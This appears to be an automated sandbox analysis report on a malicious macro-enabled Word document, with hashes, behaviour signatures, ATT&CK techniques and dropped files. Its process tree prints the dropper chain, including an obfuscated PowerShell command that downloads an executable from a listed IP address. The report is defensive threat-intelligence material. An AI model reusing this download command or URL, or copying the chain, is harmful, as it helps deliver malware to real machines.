Overview

overview

10

Static

static

8

TTP-US-246841413.docm

windows7_x64

10

TTP-US-246841413.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    81s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TTP-US-246841413.docm

  • Size

    93KB

  • MD5

    674d7910c1ee176de0e24fd0179d83ab

  • SHA1

    ff11c4281f065fa38d91e606a5e294d7fd8e312d

  • SHA256

    567b7fe91330078fd3ba9e0f152203bb4e8edf5af0d43dd09deb7273cff24b39

  • SHA512

    3825964d5a19453885e521c8e79cfc086b253bbbef34467abf94bc7044cb3c89409bcdae1313ba01ab109a60961abaa960a41e3d963f45531d377186994a94b6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.108.35.26/generator.php

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\TTP-US-246841413.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1908
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.26/generator.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
    Filesize

    21KB

    MD5

    408f33dd378d96e4ccd439f05370c3e9

    SHA1

    1da9b505753f4c3c9b7d175e181f383317455256

    SHA256

    193f23ad0bd0e9076fd0370f89bed6f48d7f72fa34b40679fcde1c5d2bc88227

    SHA512

    f1b3db9cef3e949067a56af8626d7422900d153277a9824ab64a471411092fcc2b44e79326e4e4446938875e769da170ef5b37618f820b0b96b9d522d4140337

    Download Submit
  • C:\ProgramData\OIUTFuy
    Filesize

    4KB

    MD5

    f68f78d0cdd0be34785eba37ae4787d3

    SHA1

    fdc6a82309b966af80d03db8557a98f50ed57bcf

    SHA256

    e2eb68d537314b4fceb6aeee6737102387e85cb0d5c06e4e8a3881dabbfef2d4

    SHA512

    2de718f4e079674db9bc1b0f67a43f28941623f0d8c1246120feefe372e7d9b2608fe78e223eff8c6d75731763fd66d29ecec1ee158c7430cefc6723e84d9cbd

    Download Submit
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize

    89KB

    MD5

    cbda7ec492b04a9a0258ad89779fd397

    SHA1

    3e8e0c1a59019994beaa1f5362034c3e3580a0ef

    SHA256

    21d108ef69fe0403a46c053c72e9a5b93a11d42cb2f1c098c6be762cfdda5f7e

    SHA512

    00f10131f1065c0b4b7df6f9ca2b20b2835c2e478d1116d7bc29a6d16bf8f6191055ab7da0572de32aadd111bf69958d6ffea1046c723c47cf53ab8127807d7e

    Download Submit
  • memory/368-71-0x0000000000000000-mapping.dmp
    Download
  • memory/852-81-0x0000000000000000-mapping.dmp
    Download
  • memory/1056-80-0x00000000026EB000-0x000000000270A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1056-79-0x00000000026E4000-0x00000000026E7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1056-78-0x000007FEF2B20000-0x000007FEF367D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1056-77-0x000007FEF3680000-0x000007FEF40A3000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/1056-75-0x0000000000000000-mapping.dmp
    Download
  • memory/1528-60-0x0000000000684000-0x0000000000688000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1528-58-0x0000000074DC1000-0x0000000074DC3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1528-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1528-55-0x000000006FF51000-0x000000006FF53000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1528-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1528-57-0x0000000070F3D000-0x0000000070F48000-memory.dmp
    Filesize

    44KB

    Download
  • memory/1528-63-0x0000000000684000-0x0000000000688000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1528-61-0x0000000000684000-0x0000000000688000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1528-54-0x00000000724D1000-0x00000000724D4000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1528-59-0x0000000000684000-0x0000000000688000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1628-73-0x0000000000000000-mapping.dmp
    Download
  • memory/1908-65-0x0000000000000000-mapping.dmp
    Download
  • memory/1908-67-0x000000006ACD1000-0x000000006ACD3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1956-68-0x000007FEFBB81000-0x000007FEFBB83000-memory.dmp
    Filesize

    8KB

    Download